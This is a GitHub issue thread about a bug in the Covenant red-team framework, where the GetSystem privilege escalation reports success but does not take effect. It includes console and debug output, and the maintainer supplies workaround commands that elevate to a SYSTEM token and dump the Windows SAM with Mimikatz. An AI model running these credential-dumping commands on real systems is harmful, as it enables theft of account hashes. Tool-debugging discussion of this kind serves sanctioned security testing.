### ISSUE TITLE
Getsystem / ImpersonateUser issues

### ISSUE THREAD

**Issue by stealthsploit** [cobbr/Covenant#25] opened 2019-04-12 10:28 UTC
Hi,
I've tried a couple of different launchers (PowerShell and a v4.0 binary) triggered by a local admin but in each instance I'm getting successful escalation messages that don't appear to be true. In all of the below examples my Grunt integrity is showing as 'High'.

Confirming user
`(Covenant: Grunts\96f55d128a) > whoami
[*] Started Task: WhoAmI on Grunt: 96f55d128a as GruntTask: 5a246d1dd6
(Covenant: Grunts\96f55d128a) >
[*] Grunt: 96f55d128a has completed GruntTasking: 5a246d1dd6
(Covenant: Grunts\96f55d128a) >
testdomain\localadmin
(Covenant: Grunts\96f55d128a) > getsystem
[*] Started Task: GetSystem on Grunt: 96f55d128a as GruntTask: c2c25a98c1
(Covenant: Grunts\96f55d128a) >
[*] Grunt: 96f55d128a has completed GruntTasking: c2c25a98c1
(Covenant: Grunts\96f55d128a) >
Successfully impersonated: NT AUTHORITY\SYSTEM
(Covenant: Grunts\96f55d128a) > whoami
[*] Started Task: WhoAmI on Grunt: 96f55d128a as GruntTask: 9f9859dd3e
(Covenant: Grunts\96f55d128a) >
[*] Grunt: 96f55d128a has completed GruntTasking: 9f9859dd3e
(Covenant: Grunts\96f55d128a) >
testdomain\localadmin`

Samdump
`Successfully impersonated: NT AUTHORITY\SYSTEM
(Covenant: Grunts\96f55d128a) > SamDump
[*] Started Task: Mimikatz on Grunt: 96f55d128a as GruntTask: 19b8e7dcb4
(Covenant: Grunts\96f55d128a) >
[*] Grunt: 96f55d128a has completed GruntTasking: 19b8e7dcb4
(Covenant: Grunts\96f55d128a) >

  .#####.   mimikatz 2.1.1 (x64) built on Oct 22 2018 16:32:27
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::sam
Domain : UK-WKS-10
SysKey : 932953b3dc6a918bf81a99332d07326b
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)`

Running 'ImpersonateUser "NT AUTHORITY\SYSTEM"' again shows a success but seemingly doesn't elevate my privs. I've tried impersonating SYSTEM owned processes but no luck either.

EDIT:
Forgot to add it's running on Win10 (Microsoft Windows NT 6.2.9200.0)

**Comment by stealthsploit** [comment] 2019-04-12 10:58
Here is some debugging info from the cmd window on the target machine

`Getting system...
Impersonate NT AUTHORITY\SYSTEM...
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for NT AUTHORITY\SYSTEM: 30
Attempting to impersonate: NT AUTHORITY\SYSTEM
OpenProcessToken() Error: The parameter is incorrect
Attempting to impersonate: NT AUTHORITY\SYSTEM
OpenProcess() Error: Access is denied
Attempting to impersonate: NT AUTHORITY\SYSTEM
Impersonated: NT AUTHORITY\SYSTEM
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for SYSTEM: 0
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for 1992: 0
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for 5312: 0
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for 508: 0
CreateUserProcessTokenException: GetTokenInformation() Error: Access is denied
CreateUserProcessTokenException: OpenProcess() Error: The data area passed to a system call is too small
Processes for NT AUTHORITY\SYSTEM: 28
Attempting to impersonate: NT AUTHORITY\SYSTEM
OpenProcessToken() Error: The parameter is incorrect
Attempting to impersonate: NT AUTHORITY\SYSTEM
OpenProcess() Error: Access is denied`

**Comment by cobbr** [comment] 2019-04-12 16:24
Duplicate of #18 

I've been working on a solution for this problem, and you should see a fix in the next release (v0.2.0).

**Comment by cobbr** [comment] 2019-04-12 16:26
I should also mention that you can use a temporary workaround for this specific task:

`sharpshell using (Tokens t = new Tokens()) { t.GetSystem(); return Mimikatz.SamDump(); }`

Or you could use Mimikatz's builtin command for doing this:

`Mimikatz token::elevate lsadump::sam`

**Comment by stealthsploit** [comment] 2019-04-12 17:17
Thanks for the quick reply and info.

**Comment by cobbr** [comment] 2019-05-01 19:47
Fixed in 1d1daaad77786a9eb7fb8c7be0fc56f75b653421!

**Closed by cobbr** 2019-05-01 19:47 UTC
Labels: bug, duplicate, high-priority
